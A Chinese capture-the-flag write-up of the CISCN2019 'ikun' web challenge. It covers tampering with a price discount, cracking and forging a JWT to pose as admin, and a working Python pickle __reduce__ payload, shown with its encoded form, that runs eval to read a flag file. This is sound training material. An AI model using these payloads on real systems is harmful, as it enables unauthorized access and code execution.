[CISCN2019 华北赛区 Day1 Web2]ikun

[CISCN2019 华北赛区 Day1 Web2]ikun
本题：电商平台逻辑漏洞+JWT伪造+python pickle反序列化 三个没用过的知识点…

先注册

这里提示要lv6

可以翻页，翻页后发现时在url中get传参页数

等级牌lv2对应的就是lv2
所以只要找lv6就可以了，可以用python写一个脚本来访问，检测返回的html中是否包含lv6.png

import requests
url="http://fa909550-df79-40db-b45e-1e6912103ebe.node4.buuoj.cn/shop?page="
for i in range(0,999):

    r=requests.get(url+str(i))
    if 'lv6.png' in r.text:
       print (url+str(i))
       break

page=181有lv6
直接访问

钱显然是不够的，抓包看一下

这里的三个参数，商品id，商品价格，折扣，修改价格不行，修改折扣成功

会重定向到/b1g_m4mber

提示只允许admin访问

他采用了JWT验证身份，
JWT可以说是session验证的一种替代，能大大缓解服务器的压力
这段JWT验证的数据可以解码查看一下
密码是 1Kun
解密工具：c-jwt-cracker 直接在github可以找到
用docker的方法貌似已经失效，用官方文档提供的另外方法可以

在线编辑工具https://jwt.io/

用户名改成admin，密码改成刚破解出的1Kun，复制左边的，替换bp包中的JWT，即可访问。

查看源代码，发现hint，可以下载网站源码

然后审计
在setting.py发现hint，unicode转中文后的结果提示有个后门在lv6中

定位到admin.py的反序列化操作，
为什么后门暗指了反序列化啊？但是确实没有别的可以当后门的东西，而且lv6重定向的网站也确实是这个admin中对应的提交参数的表单

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
用户身份验证
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')
@tornado.web.authenticated
反序列化的漏洞位置
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
#urllib.unquote:将存入的字典参数编码为URL查询字符串，即转换形式pickle.loads(bytes_object): 从字节对象中读取被封装的对象，并返回
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

（1）pickle.dump(obj, file, [,protocol])
    函数的功能：将obj对象序列化存入已经打开的file中。
   参数讲解：
obj：想要序列化的obj对象。file:文件名称。
protocol：序列化使用的协议。如果该项省略，则默认为0。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。
（2）pickle.load(file)
    函数的功能：将file中的对象序列化读出。    参数讲解：
file：文件名称。
（3）pickle.dumps(obj[, protocol])
   函数的功能：将obj对象序列化为string形式，而不是存入文件中。
   参数讲解：
obj：想要序列化的obj对象。
protocal：如果该项省略，则默认为0。如果为负值或HIGHEST_PROTOCOL，则使用最高的协议版本。
（4）pickle.loads(string)
   函数的功能：从string中读出序列化前的obj对象。
   参数讲解：
string：文件名称。
 【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力：dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中，随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件，并将该类序列化之后进行URL编码

用这个源码生成payload然后become参数进行传参，得到flag

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print (a)

``

c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.


注：这个反序列化第一次拿到flag到最后写完wp，被困了两个小时，重启了四次靶机，最后总结的规律是第一次如果成功利用反序列化，之后重放成功的攻击流量就会403，如果第一次反序列化没成功，第二次发送正确的流量包，不会得到flag，只会到达这里